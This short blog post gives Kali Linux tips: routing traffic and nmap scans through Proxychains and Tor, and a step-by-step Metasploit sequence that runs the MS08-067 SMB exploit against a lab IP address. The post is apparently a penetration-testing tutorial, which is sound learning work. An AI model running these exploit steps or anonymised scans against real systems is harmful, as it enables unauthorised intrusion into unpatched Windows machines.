Friday, January 11, 2019

Kali Usage Tips and Tricks

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering.

Download Kali: https://www.kali.org/downloads/

Basic Configuration Videos:





1. Use Proxychains and Tor to Visit Internet

1.1 Configure Proxychains

1.2 Install Tor
You will need to add a correct version source into /etc/apt/sorces.list file. Else your installation will fail.



echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" > /etc/apt/sources.list && apt-get update && apt-get install tor -y && apt autoremove -y


1.3 Use Proxychains to access Internet


You can run a nmap scan using Proxychains which will force the scan to run through one of the proxies in your list by typing in the following command into terminal:

proxychains nmap scanme.nmap.org

You can also test Proxychains with Firefox:

proxychains firefox www.duckduckgo.com

proxychains curl icanhazip.com



YouTube Video:


2. Use Nmap to scan targets



3. MSF - Metaspoit 
3.1 search smb
3.2 use exploit/windows/smb/ms08_067_netapi
3.3 show options
3.4 set RHOST 192.168.230.145
3.5 set target 41
3.6 exploit






YouTube - Kali Metasploit Exploit FTP Service on VSFTPD:








References:
1. tor instaling

No comments:

Post a Comment